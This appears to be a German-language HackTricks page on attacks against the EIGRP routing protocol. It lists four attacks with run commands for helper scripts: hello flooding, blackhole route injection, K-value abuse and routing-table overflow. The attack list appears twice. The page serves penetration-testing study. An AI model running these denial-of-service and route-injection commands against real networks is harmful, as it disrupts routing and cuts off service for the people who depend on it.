EIGRP Attacks

Lernen Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositorys senden.

Dies ist eine Zusammenfassung der Angriffe, die in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 exponiert wurden. Überprüfen Sie sie für weitere Informationen.

Fake EIGRP Nachbarn Angriff

Ziel: Überlastung der Router-CPUs durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann.
Tool: helloflooding.py Skript.
Ausführung: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parameter:
--interface: Gibt die Netzwerkschnittstelle an, z. B. eth0.
--as: Definiert die EIGRP-autonome Systemnummer, z. B. 1.
--subnet: Legt den Subnetzstandort fest, z. B. 10.10.100.0/24.

EIGRP Blackhole Angriff

Ziel: Unterbrechung des Netzwerkverkehrsflusses durch Einspeisen einer falschen Route, was zu einem Blackhole führt, wohin der Verkehr an ein nicht vorhandenes Ziel gerichtet wird.
Tool: routeinject.py Skript.
Ausführung: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parameter:
--interface: Gibt die Netzwerkschnittstelle des Angreifers an.
--as: Definiert die EIGRP-AS-Nummer.
--src: Legt die IP-Adresse des Angreifers fest.
--dst: Legt die Ziel-Subnetz-IP fest.
--prefix: Definiert die Maske der Ziel-Subnetz-IP.

Missbrauch von K-Werten Angriff

Ziel: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte zu erzeugen, was effektiv zu einem DoS-Angriff führt.
Tool: relationshipnightmare.py Skript.
Ausführung: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parameter:
--interface: Gibt die Netzwerkschnittstelle an.
--as: Definiert die EIGRP-AS-Nummer.
--src: Legt die IP-Adresse eines legitimen Routers fest.

Routing-Tabelle Überlauf Angriff

Ziel: Überlastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen.
Tool: routingtableoverflow.py Skript.
Ausführung: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parameter:
--interface: Gibt die Netzwerkschnittstelle an.
--as: Definiert die EIGRP-AS-Nummer.
--src: Legt die IP-Adresse des Angreifers fest.

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud Github-Repositorys senden.

PreviousDHCPv6 NextGLBP & HSRP Attacks

Last updated 4 months ago

Fake EIGRP Nachbarn Angriff

Ziel: Überlastung der Router-CPUs durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann.

Tool: helloflooding.py Skript.

Ausführung: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%

Parameter:

--interface: Gibt die Netzwerkschnittstelle an, z. B. eth0.

--as: Definiert die EIGRP-autonome Systemnummer, z. B. 1.

--subnet: Legt den Subnetzstandort fest, z. B. 10.10.100.0/24.

EIGRP Blackhole Angriff

Ziel: Unterbrechung des Netzwerkverkehrsflusses durch Einspeisen einer falschen Route, was zu einem Blackhole führt, wohin der Verkehr an ein nicht vorhandenes Ziel gerichtet wird.

Tool: routeinject.py Skript.

Ausführung: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%

Parameter:

--interface: Gibt die Netzwerkschnittstelle des Angreifers an.

--as: Definiert die EIGRP-AS-Nummer.

--src: Legt die IP-Adresse des Angreifers fest.

--dst: Legt die Ziel-Subnetz-IP fest.

--prefix: Definiert die Maske der Ziel-Subnetz-IP.

Missbrauch von K-Werten Angriff

Ziel: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte zu erzeugen, was effektiv zu einem DoS-Angriff führt.

Tool: relationshipnightmare.py Skript.

Ausführung: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%

Parameter:

--interface: Gibt die Netzwerkschnittstelle an.

--as: Definiert die EIGRP-AS-Nummer.

--src: Legt die IP-Adresse eines legitimen Routers fest.

Routing-Tabelle Überlauf Angriff

Ziel: Überlastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen.

Tool: routingtableoverflow.py Skript.

Ausführung: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%

Parameter:

--interface: Gibt die Netzwerkschnittstelle an.

--as: Definiert die EIGRP-AS-Nummer.

--src: Legt die IP-Adresse des Angreifers fest.